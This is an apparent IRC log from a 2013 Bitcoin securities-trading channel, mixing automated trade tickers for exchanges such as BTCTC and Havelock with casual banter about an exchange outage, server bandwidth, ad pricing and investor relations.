i like it when she's mean Jul 20 01:32:57 Namworld 82 something Jul 20 01:33:10 is she your wife or something, m_p? Jul 20 01:33:19 pascale lel'd heavily at PR earlier today, she finds it very amusing Jul 20 01:33:33 Jul 19 05:19:02 [MPEX] [S.DICE] [PAID] 41.96250000 BTC to 50`000`000 shares, 83 satoshi per share Jul 20 01:33:45 lordshipomokeli no she's my pr chick Jul 20 01:33:46 [BTCTC] [AMC-PT] 22 @ 0.002572 = 0.0566 BTC [-] Jul 20 01:33:56 nubbins` hey, were you here when we were discussing that impossible name ? Jul 20 01:34:03 i dont think Jul 20 01:34:05 Jul 17 21:05:39 Pascale is a common Francophone given name, feminine form of the name Pascal, and an Italian masculine given name, ancient form of Pasquale (Paschale). Jul 20 01:34:14 [BTCTC] [AMC-PT] 30 @ 0.002571 = 0.0771 BTC [-] Jul 20 01:34:19 Ah, thanks mircea Jul 20 01:34:44 [BTCTC] [AMC-PT] 98 @ 0.00257 = 0.2519 BTC [-] Jul 20 01:34:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0457 BTC [+] Jul 20 01:35:18 [BTCTC] [COGNITIVE] 1 @ 0.837999 BTC [+] Jul 20 01:35:39 [MPEX] [S.MG] 240 @ 0.0002 = 0.048 BTC [+] Jul 20 01:35:41 yeah, it means "easter" or some such Jul 20 01:35:50 i think it means playboy bunny Jul 20 01:35:54 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.00382 = 0.0458 BTC [-] Jul 20 01:36:29 close enough really Jul 20 01:36:32 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003979 = 0.008 BTC [+] Jul 20 01:36:45 there's a male tv chef named pasquale Jul 20 01:36:47 [HAVELOCK] [SMG] 1220 @ 0.00027 = 0.3294 BTC [-] Jul 20 01:37:26 "If I could raise thousands of Bitcoins, I'd allocate it to 2 or 3 really good, unique projects which are well beyond the paperwork stage. And it'd still be high risk, just rather less of one. Jul 20 01:37:26 I would love to do such a thing so if someone wants to talk to me about it, PM me please." Jul 20 01:37:28 cute. Jul 20 01:37:38 if i only were cooler i'd do cool shit. Jul 20 01:38:07 I took a hot shit. Jul 20 01:38:18 [BTCTC] [TAT.ASICMINER] 20 @ 0.045699 = 0.914 BTC [-] Jul 20 01:38:23 [BTCTC] [TAT.ASICMINER] 28 @ 0.0457 = 1.2796 BTC [+] Jul 20 01:38:43 There's a 1.76670766 BTC fee for a forced buyback on the transaction... what a ripoff! Jul 20 01:38:57 Also BTCTC went down or something when I tried to do the buyback... Jul 20 01:39:22 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003851 = 0.0385 BTC [-] Jul 20 01:39:27 "This page (https://btct.co/) is currently offline. However, because the site uses CloudFlare's Always Online™ technology you can continue to surf a snapshot of the site. We will keep checking in the background and, as soon as the site comes back, you will automatically be served the live version." Jul 20 01:39:37 Well that's fun... Jul 20 01:39:48 [BTCT:BITVPS] 1D: 0.001801 / 0.00181 / 0.0019 (209 shares, 0.4 BTC), 7D: 0.001621 / 0.00182 / 0.002198 (14319 shares, 26 BTC), 30D: 0.000833 / 0.00154 / 0.0035 (65170 shares, 100.3 BTC) Jul 20 01:39:52 i'd rather a plain old http 500 error, tbh Jul 20 01:40:13 cached version of an exchange != useful Jul 20 01:40:15 It's back. Jul 20 01:40:27 and my balance is slowly lowering on each page load lol Jul 20 01:40:52 That goat fucker guy has got game https://images.4chan.org/b/src/1374230949285.jpg Jul 20 01:41:47 I haven't even made the totals or looked at what renewals are coming up. No estimate. Jul 20 01:42:00 lol surf the snapshot opf the site Jul 20 01:42:26 right? Jul 20 01:42:41 hey cool, a week-old order book! Jul 20 01:43:17 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.0038 = 0.095 BTC [-] Jul 20 01:43:40 (plus I shouldn't disclose the month's numbers prior to the end of it, probably) Jul 20 01:45:27 [HAVELOCK] [AM100] 10 @ 0.044989 = 0.4499 BTC [-] Jul 20 01:46:08 [BTCTC] [TAT.ASICMINER] 16 @ 0.04555 = 0.7288 BTC [-] Jul 20 01:47:05 [HAVELOCK] [SDSTM] 1 @ 0.01175 BTC [+] Jul 20 01:47:08 [BTCTC] [AMC-PT] 150 @ 0.00264 = 0.396 BTC [+] Jul 20 01:48:11 [BTCTC] [TAT.ASICMINER] 13 @ 0.0455 = 0.5915 BTC [-] Jul 20 01:48:12 [BTCTC] [AMC-PT] 11 @ 0.00264 = 0.029 BTC [+] Jul 20 01:48:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.04481 = 0.0896 BTC [-] Jul 20 01:48:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.044809 = 0.1792 BTC [-] Jul 20 01:49:25 [BTCTC] [COGNITIVE] 1 @ 0.837999 BTC [+] Jul 20 01:49:27 [BTCTC] [COGNITIVE] 1 @ 0.838 BTC [+] Jul 20 01:49:28 [BTCTC] [COGNITIVE] 1 @ 0.839 BTC [+] Jul 20 01:49:30 [BTCTC] [COGNITIVE] 1 @ 0.839 BTC [+] Jul 20 01:49:31 [BTCTC] [COGNITIVE] 1 @ 0.83945 BTC [+] Jul 20 01:50:43 [BTCTC] [BASIC-MINING] 1 @ 0.727 BTC [-] Jul 20 01:51:39 5.37634408602 Jul 20 01:51:45 0.186 Jul 20 01:52:54 [BTCTC] [GSDPT] 6 @ 0.003151 = 0.0189 BTC [+] Jul 20 01:53:25 A buyback has been made! Jul 20 01:53:59 I had entered 350084 satoshi per share but somehow the 84 satoshi didn't make it in ._. Jul 20 01:55:20 [MPEX] [S.MPOE] 5450 @ 0.00089 = 4.8505 BTC [+] Jul 20 01:55:35 [BTCTC] [ASICMINER-PT] 5 @ 4.6501 = 23.2505 BTC [-] Jul 20 01:55:38 0.0833333333333 Jul 20 01:58:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.045697 = 0.2285 BTC [+] Jul 20 02:00:30 [BTCTC] [AMC-PT] 423 @ 0.00264 = 1.1167 BTC [+] Jul 20 02:00:36 [BTCTC] [BITVPS] 19 @ 0.001899 = 0.0361 BTC [+] Jul 20 02:00:39 [BTCTC] [BITVPS] 56 @ 0.0019 = 0.1064 BTC [+] Jul 20 02:00:40 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 20 02:01:46 [BTCTC] [AMC-PT] 1107 @ 0.00264 = 2.9225 BTC [+] Jul 20 02:02:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.045696 = 0.457 BTC [-] Jul 20 02:02:59 [BTCTC] [AMC-PT] 4 @ 0.002639 = 0.0106 BTC [-] Jul 20 02:03:00 [BTCTC] [ASICMINER-PT] 2 @ 4.699999 = 9.4 BTC [+] Jul 20 02:04:18 [BTCTC] [DMS.SELLING] 173 @ 0.023997 = 4.1515 BTC [-] Jul 20 02:07:21 Well I'm officially out of liquid BTC Jul 20 02:07:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003804 = 0.038 BTC [+] Jul 20 02:08:44 Namworld, i find the gaseous btc is better than the liquid btc anyways Jul 20 02:09:01 [BTCTC] [MININGCO.ETF] 3 @ 2.01 = 6.03 BTC [+] Jul 20 02:09:08 or you could go for the solid btc too, if you really want Jul 20 02:09:27 i prefer non-newtonian solids Jul 20 02:09:34 I find that too volatile, it tends to escape. Jul 20 02:09:40 liquid or solid is better Jul 20 02:09:49 proof of fart Jul 20 02:09:51 just around the corner Jul 20 02:10:04 Namworld: https://www.bitvps.com/dedicated-servers -- 5 TB vs 100 Mbps, not sure if intended Jul 20 02:10:06 a little exlax in it will speed it through the blockchain Jul 20 02:10:07 shit, wait, it's non-newtonian liquid. silly putty etc Jul 20 02:10:13 i can't even get my states of matter right Jul 20 02:10:27 don't forget plasmic Jul 20 02:10:45 might as well just delete wallet.dat immediately Jul 20 02:10:51 lord, it's not 5 Tbps Jul 20 02:11:35 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.003804 = 0.0266 BTC [+] Jul 20 02:11:46 Just max bandwidth usage. Jul 20 02:11:52 It's intended that way. Jul 20 02:12:14 The larger ones just have 100 mbps connection, unlimited usage. Jul 20 02:15:16 yeah, i think it's clear, that it's storage vs. bandwidth, but it was confusing to mix both as the proper continuation in this case would be "unlimited" .. that lead to my question :) Jul 20 02:15:39 because 5Tb to a server is so common, easy mistake to make Jul 20 02:19:03 haha 5Tb... i'd be like 100gbit ddos? meh. Jul 20 02:19:21 [HAVELOCK] [AM100] 50 @ 0.04381101 = 2.1906 BTC [-] Jul 20 02:19:26 finally upload warms just as much as mining Jul 20 02:19:52 [HAVELOCK] [AM100] 30 @ 0.04381101 = 1.3143 BTC [-] Jul 20 02:20:03 [BTCTC] [COGNITIVE] 1 @ 0.838999 BTC [-] Jul 20 02:20:15 [BTCTC] [COGNITIVE] 1 @ 0.839 BTC [+] Jul 20 02:20:56 [HAVELOCK] [AM100] 25 @ 0.04381101 = 1.0953 BTC [-] Jul 20 02:21:32 theres an education network round these parts claiming a 2T backbone but 5 to the node seems a little way off Jul 20 02:23:51 [BTCTC] [AMC-PT] 500 @ 0.002601 = 1.3005 BTC [-] Jul 20 02:25:52 [BTCTC] [AMC-PT] 8 @ 0.002601 = 0.0208 BTC [-] Jul 20 02:25:54 [BTCTC] [AMC-PT] 20 @ 0.0026 = 0.052 BTC [-] Jul 20 02:25:55 [BTCTC] [AMC-PT] 70 @ 0.002571 = 0.18 BTC [-] Jul 20 02:25:57 [BTCTC] [AMC-PT] 602 @ 0.00257 = 1.5471 BTC [-] Jul 20 02:25:58 [BTCTC] [AMC-PT] 39 @ 0.00257 = 0.1002 BTC [-] Jul 20 02:26:00 [BTCTC] [AMC-PT] 920 @ 0.002563 = 2.358 BTC [-] Jul 20 02:26:01 [BTCTC] [AMC-PT] 1000 @ 0.00256 = 2.56 BTC [-] Jul 20 02:26:03 [BTCTC] [AMC-PT] 275 @ 0.00255 = 0.7013 BTC [-] Jul 20 02:26:04 [BTCTC] [AMC-PT] 500 @ 0.002541 = 1.2705 BTC [-] Jul 20 02:26:13 [BTCTC] [AMC-PT] 250 @ 0.00254 = 0.635 BTC [-] Jul 20 02:26:58 [HAVELOCK] [SMG] 1 @ 0.000272 BTC [+] Jul 20 02:27:00 [BTCTC] [AMC-PT] 75 @ 0.002535 = 0.1901 BTC [-] Jul 20 02:27:02 [BTCTC] [AMC-PT] 200 @ 0.002526 = 0.5052 BTC [-] Jul 20 02:27:03 [BTCTC] [AMC-PT] 3741 @ 0.00252 = 9.4273 BTC [-] Jul 20 02:27:22 [HAVELOCK] [SDSTM] 2 @ 0.01175 = 0.0235 BTC [+] Jul 20 02:27:59 [HAVELOCK] [AM100] 32 @ 0.043811 = 1.402 BTC [-] Jul 20 02:28:48 [BTCTC] [AMC-PT] 75 @ 0.002522 = 0.1892 BTC [+] Jul 20 02:28:56 [BTCTC] [AMC-PT] 2000 @ 0.002521 = 5.042 BTC [-] Jul 20 02:28:58 [BTCTC] [AMC-PT] 1696 @ 0.00252 = 4.2739 BTC [-] Jul 20 02:29:04 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003805 = 0.0381 BTC [+] Jul 20 02:29:48 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.003804 = 0.3424 BTC [-] Jul 20 02:29:51 [HAVELOCK] [HIM] 1 @ 0.268 BTC [-] Jul 20 02:30:15 [BTCTC] [ASICMINER-PT] 3 @ 4.21 = 12.63 BTC [-] Jul 20 02:30:28 [BTCTC] [AMC-PT] 2000 @ 0.00252 = 5.04 BTC [-] Jul 20 02:31:24 [HAVELOCK] [AM100] 8 @ 0.04381 = 0.3505 BTC [-] Jul 20 02:31:35 [HAVELOCK] [AM100] 11 @ 0.04380101 = 0.4818 BTC [-] Jul 20 02:31:38 [BTCTC] [AMC-PT] 70 @ 0.002638 = 0.1847 BTC [+] Jul 20 02:31:40 [BTCTC] [AMC-PT] 2933 @ 0.002639 = 7.7402 BTC [+] Jul 20 02:31:44 [HAVELOCK] [AM100] 500 @ 0.0438 = 21.9 BTC [-] Jul 20 02:32:22 [BTCTC] [AMC-PT] 649 @ 0.00252 = 1.6355 BTC [-] Jul 20 02:32:24 [BTCTC] [AMC-PT] 629 @ 0.002508 = 1.5775 BTC [-] Jul 20 02:32:26 [BTCTC] [AMC-PT] 500 @ 0.002501 = 1.2505 BTC [-] Jul 20 02:32:26 [BTCTC] [AMC-PT] 4 @ 0.002501 = 0.01 BTC [-] Jul 20 02:32:28 [BTCTC] [AMC-PT] 10000 @ 0.002501 = 25.01 BTC [-] Jul 20 02:34:53 [BTCTC] [AMC-PT] 515 @ 0.002639 = 1.3591 BTC [+] Jul 20 02:35:37 [BTCTC] [AMC-PT] 1 @ 0.002638 BTC [-] Jul 20 02:35:55 [BTCTC] [AMC-PT] 500 @ 0.002501 = 1.2505 BTC [-] Jul 20 02:35:57 [BTCTC] [AMC-PT] 6050 @ 0.0025 = 15.125 BTC [-] Jul 20 02:37:47 [BTCTC] [AMC-PT] 350 @ 0.0025 = 0.875 BTC [-] Jul 20 02:37:49 [BTCTC] [AMC-PT] 140 @ 0.0025 = 0.35 BTC [-] Jul 20 02:37:58 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jul 20 02:39:02 [BTCTC] [AMC-PT] 499 @ 0.0025 = 1.2475 BTC [-] Jul 20 02:39:54 [BTCTC] [AMC-PT] 600 @ 0.0025 = 1.5 BTC [-] Jul 20 02:40:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003974 BTC [+] Jul 20 02:41:36 [BTCTC] [COGNITIVE] 1 @ 0.838899 BTC [-] Jul 20 02:41:38 [BTCTC] [COGNITIVE] 1 @ 0.8389 BTC [+] Jul 20 02:41:39 [BTCTC] [COGNITIVE] 2 @ 0.839 = 1.678 BTC [+] Jul 20 02:41:41 [BTCTC] [COGNITIVE] 4 @ 0.83945 = 3.3578 BTC [+] Jul 20 02:44:41 [BTCTC] [AMC-PT] 1500 @ 0.002498 = 3.747 BTC [-] Jul 20 02:44:43 [BTCTC] [AMC-PT] 1000 @ 0.002496 = 2.496 BTC [-] Jul 20 02:44:45 [BTCTC] [DMS.MINING] 5 @ 0.016243 = 0.0812 BTC [+] Jul 20 02:45:41 [BTCTC] [DMS.SELLING] 2 @ 0.023999 = 0.048 BTC [+] Jul 20 02:47:48 [BTCTC] [BASIC-MINING] 3 @ 0.700003 = 2.1 BTC [-] Jul 20 02:47:50 [BTCTC] [BASIC-MINING] 4 @ 0.700002 = 2.8 BTC [-] Jul 20 02:47:52 [BTCTC] [BASIC-MINING] 5 @ 0.7 = 3.5 BTC [-] Jul 20 02:47:53 [BTCTC] [BASIC-MINING] 1 @ 0.7 BTC [-] Jul 20 02:47:54 [BTCTC] [BASIC-MINING] 1 @ 0.695304 BTC [-] Jul 20 02:47:55 [BTCTC] [BASIC-MINING] 1 @ 0.6953 BTC [-] Jul 20 02:47:57 [BTCTC] [BASIC-MINING] 1 @ 0.6953 BTC [-] Jul 20 02:47:58 [BTCTC] [BASIC-MINING] 21 @ 0.6953 = 14.6013 BTC [-] Jul 20 02:48:00 [HAVELOCK] [SMG] 9 @ 0.000272 = 0.0024 BTC [+] Jul 20 02:48:11 [HAVELOCK] [SMG] 10 @ 0.00027 = 0.0027 BTC [-] Jul 20 02:48:27 [HAVELOCK] [SMG] 11 @ 0.000262 = 0.0029 BTC [-] Jul 20 02:49:36 [BTCTC] [TAT.ASICMINER] 11 @ 0.044613 = 0.4907 BTC [-] Jul 20 02:49:47 [BTCTC] [COGNITIVE] 6 @ 0.83945 = 5.0367 BTC [+] Jul 20 02:49:48 [BTCTC] [AMC-PT] 50 @ 0.002491 = 0.1246 BTC [-] Jul 20 02:49:48 [BTCTC] [COGNITIVE] 2 @ 0.8395 = 1.679 BTC [+] Jul 20 02:49:56 [BTCTC] [AMC-PT] 50 @ 0.00249 = 0.1245 BTC [-] Jul 20 02:49:58 [BTCTC] [COGNITIVE] 22 @ 0.84 = 18.48 BTC [+] Jul 20 02:49:59 [BTCTC] [AMC-PT] 60 @ 0.00249 = 0.1494 BTC [-] Jul 20 02:50:01 [BTCTC] [AMC-PT] 120 @ 0.00248 = 0.2976 BTC [-] Jul 20 02:50:31 [BTCTC] [BASIC-MINING] 2 @ 0.726999 = 1.454 BTC [+] Jul 20 02:51:25 [BTCTC] [AMC-PT] 100 @ 0.002637 = 0.2637 BTC [+] Jul 20 02:51:54 [BTCTC] [AMC-PT] 109 @ 0.002637 = 0.2874 BTC [+] Jul 20 02:51:56 [BTCTC] [AMC-PT] 86 @ 0.00248 = 0.2133 BTC [-] Jul 20 02:52:43 [BTCTC] [ASICMINER-PT] 2 @ 4.699999 = 9.4 BTC [+] Jul 20 02:52:45 [BTCTC] [ASICMINER-PT] 5 @ 4.7 = 23.5 BTC [+] Jul 20 02:52:54 [BTCTC] [AMC-PT] 109 @ 0.00248 = 0.2703 BTC [-] Jul 20 02:52:55 [BTCTC] [AMC-PT] 2 @ 0.00248 = 0.005 BTC [-] Jul 20 02:53:30 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 20 02:53:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.044612 BTC [-] Jul 20 02:53:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.044602 BTC [-] Jul 20 02:53:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0446 BTC [-] Jul 20 02:53:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.0445 = 0.267 BTC [-] Jul 20 02:53:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.044001 = 0.132 BTC [-] Jul 20 02:54:09 [HAVELOCK] [AM100] 5 @ 0.0437 = 0.2185 BTC [-] Jul 20 02:54:45 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003923 = 0.0078 BTC [-] Jul 20 02:54:47 [BTCTC] [ASICMINER-PT] 10 @ 4.717 = 47.17 BTC [+] Jul 20 02:55:07 [MPEX] [S.MPOE] 3200 @ 0.00089 = 2.848 BTC [+] Jul 20 02:55:09 [MPEX] [S.MPOE] 5587 @ 0.00089369 = 4.993 BTC [+] Jul 20 02:56:34 [HAVELOCK] [SMG] 2500 @ 0.0002622 = 0.6555 BTC [+] Jul 20 02:57:16 [BTCTC] [COGNITIVE] 6 @ 0.84 = 5.04 BTC [+] Jul 20 02:58:31 [BTCTC] [COGNITIVE] 1 @ 0.847 BTC [+] Jul 20 02:59:34 [BTCTC] [AMC-PT] 1 @ 0.002637 BTC [+] Jul 20 02:59:52 [BTCTC] [DMS.PURCHASE] 1 @ 0.039416 BTC [-] Jul 20 03:02:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003611 BTC [-] Jul 20 03:03:36 [HAVELOCK] [AM100] 12 @ 0.044199 = 0.5304 BTC [+] Jul 20 03:05:27 [BTCTC] [AMC-PT] 212 @ 0.0025 = 0.53 BTC [-] Jul 20 03:10:18 [BTCTC] [AMC-PT] 700 @ 0.002499 = 1.7493 BTC [-] Jul 20 03:12:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.045593 = 0.4559 BTC [+] Jul 20 03:18:03 [BTCTC] [AMC-PT] 1042 @ 0.002499 = 2.604 BTC [-] Jul 20 03:19:34 [BTCTC] [COGNITIVE] 4 @ 0.847 = 3.388 BTC [+] Jul 20 03:20:37 [BTCTC] [COGNITIVE] 1 @ 0.847999 BTC [+] Jul 20 03:20:38 [BTCTC] [COGNITIVE] 1 @ 0.84887 BTC [+] Jul 20 03:21:40 [BTCTC] [AMC-PT] 20 @ 0.002472 = 0.0494 BTC [-] Jul 20 03:21:42 [BTCTC] [AMC-PT] 148 @ 0.00246 = 0.3641 BTC [-] Jul 20 03:21:43 [BTCTC] [AMC-PT] 3832 @ 0.00246 = 9.4267 BTC [-] Jul 20 03:22:25 [BTCTC] [AMC-PT] 255 @ 0.002499 = 0.6372 BTC [+] Jul 20 03:22:26 [BTCTC] [BASIC-MINING] 1 @ 0.695301 BTC [-] Jul 20 03:23:08 [BTCTC] [COGNITIVE] 1 @ 0.84887 BTC [+] Jul 20 03:23:51 [HAVELOCK] [AM100] 1 @ 0.04439 BTC [+] Jul 20 03:25:14 i feel like i'm missing something.. does stock value any financial influence on a company, after an ipo was raised? Jul 20 03:25:35 *has Jul 20 03:27:16 [BTCTC] [AMC-PT] 1701 @ 0.002499 = 4.2508 BTC [+] Jul 20 03:27:41 [BTCTC] [AMC-PT] 3061 @ 0.0025 = 7.6525 BTC [+] Jul 20 03:28:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.045587 = 0.1823 BTC [-] Jul 20 03:28:56 not normally. Jul 20 03:30:02 so why should a company keep it's investors happy then? Jul 20 03:30:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.045587 = 0.0912 BTC [-] Jul 20 03:31:18 because this is the internet, and so therefore the only concern of anyone on the internet is what other people on the internet say Jul 20 03:31:37 especially random anon dudes on forums. Jul 20 03:32:15 [BTCTC] [DMS.PURCHASE] 4 @ 0.039416 = 0.1577 BTC [-] Jul 20 03:44:52 [HAVELOCK] [SDSTM] 18 @ 0.01175 = 0.2115 BTC [+] Jul 20 03:46:06 http://www.nytimes.com/2013/07/19/world/europe/romanians-tale-has-art-world-fearing-worst.html?pagewanted=all&_r=2& Jul 20 03:46:08 check that shit out Jul 20 03:47:06 [BTCTC] [AMC-PT] 54 @ 0.00262 = 0.1415 BTC [+] Jul 20 03:48:11 [BTCTC] [AMC-PT] 1 @ 0.00262 BTC [+] Jul 20 03:48:14 [BTCTC] [COGNITIVE] 1 @ 0.84887 BTC [+] Jul 20 03:48:26 [BTCTC] [AMC-PT] 3777 @ 0.00262 = 9.8957 BTC [+] Jul 20 03:48:48 [BTCTC] [COGNITIVE] 2 @ 0.85 = 1.7 BTC [+] Jul 20 03:49:27 [BTCTC] [AMC-PT] 1 @ 0.002628 BTC [+] Jul 20 03:50:08 [HAVELOCK] [AM100] 10 @ 0.0442 = 0.442 BTC [-] Jul 20 03:50:32 [HAVELOCK] [AM100] 12 @ 0.044382 = 0.5326 BTC [+] Jul 20 03:50:58 [BTCTC] [AMC-PT] 29 @ 0.002628 = 0.0762 BTC [+] Jul 20 03:51:16 crazy Jul 20 03:51:18 [HAVELOCK] [AM100] 10 @ 0.044383 = 0.4438 BTC [+] Jul 20 03:51:32 Yargh! Evening to all! Jul 20 03:51:40 [HAVELOCK] [AM100] 10 @ 0.04438499 = 0.4438 BTC [+] Jul 20 03:51:43 [HAVELOCK] [AM100] 10 @ 0.04438599 = 0.4439 BTC [+] Jul 20 03:51:44 [HAVELOCK] [AM100] 10 @ 0.04438699 = 0.4439 BTC [+] Jul 20 03:51:46 [HAVELOCK] [AM100] 10 @ 0.04438799 = 0.4439 BTC [+] Jul 20 03:51:48 [HAVELOCK] [AM100] 10 @ 0.04438999 = 0.4439 BTC [+] Jul 20 03:51:50 [HAVELOCK] [AM100] 23 @ 0.044391 = 1.021 BTC [+] Jul 20 03:51:53 [HAVELOCK] [AM100] 27 @ 0.044393 = 1.1986 BTC [+] Jul 20 03:52:16 [BTCTC] [AMC-PT] 821 @ 0.002628 = 2.1576 BTC [+] Jul 20 03:52:18 [BTCTC] [AMC-PT] 1 @ 0.00262 BTC [-] Jul 20 03:52:19 [BTCTC] [AMC-PT] 500 @ 0.00251 = 1.255 BTC [-] Jul 20 03:52:21 [BTCTC] [AMC-PT] 629 @ 0.0025 = 1.5725 BTC [-] Jul 20 03:52:23 [HAVELOCK] [AM100] 5 @ 0.044396 = 0.222 BTC [+] Jul 20 03:52:24 [HAVELOCK] [AM100] 70 @ 0.04439886 = 3.1079 BTC [+] Jul 20 03:52:58 [HAVELOCK] [AM100] 2 @ 0.04439886 = 0.0888 BTC [+] Jul 20 03:53:17 [HAVELOCK] [SDSTM] 1 @ 0.0118 BTC [+] Jul 20 03:53:50 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jul 20 03:59:45 [HAVELOCK] [SDSTM] 2 @ 0.0118 = 0.0236 BTC [+] Jul 20 04:04:16 [BTCTC] [AMC-PT] 30 @ 0.002629 = 0.0789 BTC [+] Jul 20 04:05:39 late to the conversation, but, company management (in the real world) *works* for the stockholders. that is why they should keep investors happy. Jul 20 04:06:23 [BTCTC] [AMC-PT] 48 @ 0.002501 = 0.12 BTC [-] Jul 20 04:07:24 [BTCTC] [S.MPOE-PT] 3 @ 0.000806 = 0.0024 BTC [-] Jul 20 04:07:41 [BTCTC] [BASIC-MINING] 2 @ 0.695901 = 1.3918 BTC [+] Jul 20 04:08:25 mike_c depends what you mean by happy. Jul 20 04:08:26 [BTCTC] [S.BBET-PT] 5 @ 0.002019 = 0.0101 BTC [+] Jul 20 04:09:10 by happy I mean they should keep investors believing that 1) they are working in there best interest and 2) doing so effectively. Jul 20 04:09:15 *their Jul 20 04:09:28 not of course, that they are going to make the stock price go up every quarter. Jul 20 04:09:30 [BTCTC] [S.MPOE-PT] 1 @ 0.000882 BTC [+] Jul 20 04:10:33 [BTCTC] [BASIC-MINING] 1 @ 0.695901 BTC [+] Jul 20 04:12:22 [BTCTC] [DMS.PURCHASE] 272 @ 0.039416 = 10.7212 BTC [-] Jul 20 04:13:28 [BTCTC] [BASIC-MINING] 3 @ 0.724999 = 2.175 BTC [+] Jul 20 04:14:57 [BTCTC] [COGNITIVE] 1 @ 0.85 BTC [+] Jul 20 04:18:05 What is the cost to advertise on BitBet? Ping kakobrekla and mircea_popescu Jul 20 04:20:09 mike_c ya well, by happy forumers tend to understand something more akin to validating them. Jul 20 04:27:30 [BTCTC] [TAT.ASICMINER] 9 @ 0.045571 = 0.4101 BTC [-] Jul 20 04:34:47 [BTCTC] [AMC-PT] 781 @ 0.00253 = 1.9759 BTC [+] Jul 20 04:38:01 [BTCTC] [AMC-PT] 1000 @ 0.00255 = 2.55 BTC [+] Jul 20 04:38:14 [HAVELOCK] [AM100] 1 @ 0.044396 BTC [-] Jul 20 04:39:26 [HAVELOCK] [SMG] 6 @ 0.00032 = 0.0019 BTC [+] Jul 20 04:39:47 [HAVELOCK] [SMG] 10 @ 0.00032999 = 0.0033 BTC [+] Jul 20 04:40:34 [BTCTC] [AMC-PT] 782 @ 0.002599 = 2.0324 BTC [+] Jul 20 04:40:36 [BTCTC] [AMC-PT] 904 @ 0.002599 = 2.3495 BTC [+] Jul 20 04:40:37 [BTCTC] [AMC-PT] 5431 @ 0.002599 = 14.1152 BTC [+] Jul 20 04:40:44 [HAVELOCK] [SMG] 30 @ 0.00033 = 0.0099 BTC [+] Jul 20 04:41:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.045568 = 0.0911 BTC [-] Jul 20 04:41:47 [BTCTC] [TAT.ASICMINER] 34 @ 0.045569 = 1.5493 BTC [+] Jul 20 04:42:26 [BTCTC] [S.MPOE-PT] 77 @ 0.000882 = 0.0679 BTC [+] Jul 20 04:42:33 [BTCTC] [S.MPOE-PT] 50 @ 0.000883 = 0.0442 BTC [+] Jul 20 04:42:35 [BTCTC] [S.MPOE-PT] 100 @ 0.000889 = 0.0889 BTC [+] Jul 20 04:42:35 [BTCTC] [S.MPOE-PT] 1000 @ 0.00089 = 0.89 BTC [+] Jul 20 04:42:37 [BTCTC] [S.MPOE-PT] 79 @ 0.000894 = 0.0706 BTC [+] Jul 20 04:42:38 [BTCTC] [S.MPOE-PT] 765 @ 0.000895 = 0.6847 BTC [+] Jul 20 04:42:40 [BTCTC] [S.MPOE-PT] 1344 @ 0.0009 = 1.2096 BTC [+] Jul 20 04:42:42 [BTCTC] [S.MPOE-PT] 2 @ 0.0009 = 0.0018 BTC [+] Jul 20 04:46:58 Namworld .5 btc min, otherwise whatever you want to pay. you get added to rotation for 30 days, get displayed based on % of total. Jul 20 04:48:38 Ah, I see Jul 20 04:48:58 [BTCTC] [AMC-PT] 3500 @ 0.0026 = 9.1 BTC [+] Jul 20 04:49:24 I guess I'll try with .5 for now, to test and track results. Jul 20 04:49:59 [MPEX] [S.MG] 80000 @ 0.00020001 = 16.0008 BTC [+] Jul 20 04:50:04 np. mail an ad. Jul 20 04:51:48 Hmm, I notice there's a 1px border added to ads. It kind of would mess with my round corner banner. Jul 20 04:57:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.045575 BTC [+] Jul 20 05:02:54 [HAVELOCK] [SMG] 10 @ 0.00033 = 0.0033 BTC [+] Jul 20 05:04:03 [HAVELOCK] [AM100] 13 @ 0.044396 = 0.5771 BTC [-] Jul 20 05:06:51 [BTCTC] [DMS.SELLING] 18 @ 0.023999 = 0.432 BTC [+] Jul 20 05:08:13 anyone interested in buying some btc at a cheaper than market price price for PP ? :) Jul 20 05:09:33 [BTCTC] [DMS.SELLING] 10 @ 0.024 = 0.24 BTC [+] Jul 20 05:09:34 [BTCTC] [DMS.SELLING] 2 @ 0.024 = 0.048 BTC [+] Jul 20 05:12:13 [HAVELOCK] [SMG] 5 @ 0.00033 = 0.0017 BTC [+] Jul 20 05:12:54 [BTCTC] [DMS.PURCHASE] 5 @ 0.039416 = 0.1971 BTC [-] Jul 20 05:14:51 [BTCTC] [DMS.SELLING] 1 @ 0.023999 BTC [-] Jul 20 05:15:46 [BTCTC] [AMC-PT] 2 @ 0.0026 = 0.0052 BTC [+] Jul 20 05:15:47 [BTCTC] [DMS.SELLING] 7 @ 0.023999 = 0.168 BTC [-] Jul 20 05:16:03 [HAVELOCK] [SMG] 500 @ 0.00033 = 0.165 BTC [+] Jul 20 05:16:21 [HAVELOCK] [SMG] 150 @ 0.00033 = 0.0495 BTC [+] Jul 20 05:17:27 [BTCTC] [COGNITIVE] 1 @ 0.853 BTC [+] Jul 20 05:18:17 [HAVELOCK] [SMG] 11 @ 0.00033 = 0.0036 BTC [+] Jul 20 05:18:37 [BTCTC] [COGNITIVE] 1 @ 0.855 